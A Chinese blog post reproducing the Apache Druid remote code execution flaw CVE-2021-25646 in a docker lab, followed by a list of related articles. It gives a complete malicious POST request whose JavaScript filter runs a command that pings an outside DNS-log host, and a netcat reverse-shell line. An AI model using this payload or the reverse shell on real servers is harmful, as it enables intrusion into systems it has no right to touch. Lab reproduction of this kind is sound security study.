Apache Druid 远程代码执行漏洞

最新推荐文章于 2024-05-26 08:32:52 发布
最新推荐文章于 2024-05-26 08:32:52 发布
阅读量856 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/113759511
版权

漏洞简介

Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。

影响版本:Apache Druid < 0.20.1

环境搭建

#拉取镜像
docker pull fokkodriesprong/docker-druid
#启动镜像
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

访问8888端口

在这里插入图片描述

环境搭建成功。

漏洞复现
抓包,替换数据包POC

在这里插入图片描述

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.5.138:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 556
Origin: http://192.168.46.131:8888
Connection: close
Referer: http://192.168.46.131:8888/unified-console.html

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping pin77y.dnslog.cn')}",     #此处输入要执行的命令
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

查看dnslog记录

在这里插入图片描述
由于是docker环境,没有bash,可以利用sh
里面有nc,可使用nc反弹shell
nc IP地址 监听端口 -e /bin/sh

per_se_veran_ce
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1709
Apache Druid远程代码执行漏洞(CVE-2021-25646)
Apache Druid远程代码执行漏洞(CVE-2021-25646)
chaojixiaojingang
03-15 9591
1.漏洞描述 Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 2.影响版本 Apache Druid < 0.20...
Druid未授权漏洞进一步的利用
最新发布
qq_53058639的博客
05-26 529
对于druid未授权,大多数白帽子在做测试的时候都是当作一个低危的信息泄露来处理,但是其实如果利用条件都达成了,运气够好的话,造成的危害还是不小的。这也告诉我们以后碰到这种未授权漏洞,可以多收集一些信息,扩宽一下测试思路,说不定就能获得更大的收获。
Apache Druid命令执行漏洞复现
weixin_53696027的博客
06-02 527
CVE-2019-25646是由由阿里云安全发现的 Apache Druid 远程代码执行漏洞
Apache Druid 远程代码执行漏洞(CVE-2021-26919)
RAFANra的博客
03-30 1320
Apache Druid 远程代码执行漏洞(CVE-2021-26919) 漏洞名称 : Apache Druid 远程代码执行漏洞(CVE-2021-26919) 组件名称 : Apache Druid 影响范围 : Apache Druid <0.20.2 漏洞类型 : 远程代码执行 利用条件 : 1、用户认证:不需要用户认证 2、触发方式:远程 造成后果 : 允许未经身份验证的攻击者执行任意代码。 2021年3月30日,深信服安全团队监测到一则组件存在 Apache Druid远程代码执行漏洞
Apache Druid 远程代码执行漏洞 (CVE-2021-25646)
qq_22807425的博客
02-02 703
Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 0x00 前言 首发于timeline sec 团队公众号 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 0x01 漏洞描述 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的jso
Apache Druid远程代码执行漏洞响应通告
05-05
Apache Druid远程代码执行漏洞响应通告
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
Apache Druid CVE-2021-25646 远程代码执行漏洞深度解析》 Apache Druid,作为一个高性能、列式存储的开源分布式数据存储系统,广泛应用于商业智能和OLAP(在线分析处理)场景,以处理大量实时和历史数据。然而,...
2023攻防演练必修高危漏洞集合
08-06
e-cology9 用户登录漏洞、Foxit PDF Reader/Editor exportXFAData 远程代码执行漏洞、Grafana JWT 泄露漏洞Apache Superset 会话认证漏洞Apache Druid 远程代码执行漏洞Apache Solr 远程代码执行漏洞等多个...
2023攻防演练必修高危漏洞集合.pdf
07-23
Apache Druid 存在远程代码执行漏洞,攻击者可以通过构造恶意请求执行恶意代码,可能会导致服务器被控制和敏感数据泄露。 十四、Apache Solr 远程代码执行漏洞 (CNVD-2023-27598) Apache Solr 存在远程代码执行...
Log4j2漏洞检测工具
02-06
Apache log4j 2是一款...经验证,Apache Struts2、Apache Solr、Apache DruidApache Flink等众多组件与大型应用均受影响,该漏洞无需授权即可远程代码执行,一旦被攻击者利用会造成严重后果,影响范围覆盖各行各业。
druid实现springmvc数据库连接的用户名和密码加密
03-18
一般druid-1.0.4.jar的配置只能实现springmvc端密码的加,本文扩展了这一限制,将加密范围扩展到用户名,甚至还可以对url和driver 进行加密
CVE-2021-25646:Apache Druid远程代码执行漏洞
就是法老
08-24 2134
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
踩坑日志 - 记录一次因Druid 1.1.22版本Bug造成服务性能受损的排查过程
wt的博客
06-06 2288
现象 某个下午,某个服务的测试环境突然出现大量接口延时告警,从监控上看,接口p99耗时基本都达到了5s以上,而且接口延时越来越长 随着业务方的不断超时重试,数据库线程被打满,等待线程数飙高,大量线程阻塞 初步排查过程 1、通过APM链路监控,我们发现所有链路的主要耗时都集中在了DataSource#getConnection这个过程中 2、初步怀疑,可能是因为存在SQL 慢查询导致,但后来发现根因并不在此,因为监控显示,当时最慢的SQL99线是56.99ms,qps低于0.01(基本可以排除SQL慢查
【Java】Druid未授权访问漏洞如何处理
姜太小白的博客
07-06 8733
Druid未授权访问漏洞如何处理
Apache druid未授权命令执行漏洞复现
蚁景网安学院
02-03 3045
喜欢就关注我吧,订阅更多最新消息简介Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以...
Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)
热门推荐
墨痕诉清风的博客
11-12 1万+
1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池.2.Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控.
Apache Dubbo 被曝出“高危”远程代码执行漏洞
朱小厮的博客
06-25 1212
击上方“朱小厮的博客”,选择“设为星标”后台回复"加群",加入组织来源:22j.co/brUT0x01 漏洞背景2020年06月23日, 360CERT监测发现 Apac...
Apache Druid命令执行漏洞(CVE-2021-25646)复现
weixin_46137328的博客
02-04 1419
0x00 漏洞概述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 包括执行用户提供的...
Apache Druid rce漏洞
04-27
2021年5月,Apache Druid官方发布了一份安全公告,称该软件存在一个高风险的远程代码执行(RCE)漏洞,该漏洞可能导致攻击者可以通过恶意负载文件执行任意代码,甚至可能完全控制受影响的系统。建议用户及时升级到受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值